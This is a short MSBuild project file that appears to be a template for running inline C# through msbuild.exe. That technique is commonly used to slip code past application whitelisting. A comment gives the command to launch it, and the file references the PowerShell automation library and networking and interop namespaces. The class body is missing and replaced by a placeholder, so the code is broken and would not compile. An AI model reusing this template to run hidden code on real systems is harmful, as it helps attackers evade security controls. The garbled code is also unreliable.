<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe X.csproj -->
  <Target Name="m4ud">
   <ClassExample />
  </Target>
    <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
     <Reference Include="C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" />
     <!-- Your PowerShell Path may be different -->
      <Code Type="Class" Language="cs">
        <![CDATA[
            using System;
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;
            using System.Collections.ObjectModel;
            using System.Diagnostics;
            using System.Runtime.InteropServices;
            using System.Net;
            using System.Text;
            using System.Threading;
                public class ClassExample : Task, ITask
                X.X.Y.Y
                    }
                public override bool Execute()
                {
                      
                    Main(new string[0]);
                    return true;
                }  
                }
                            
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
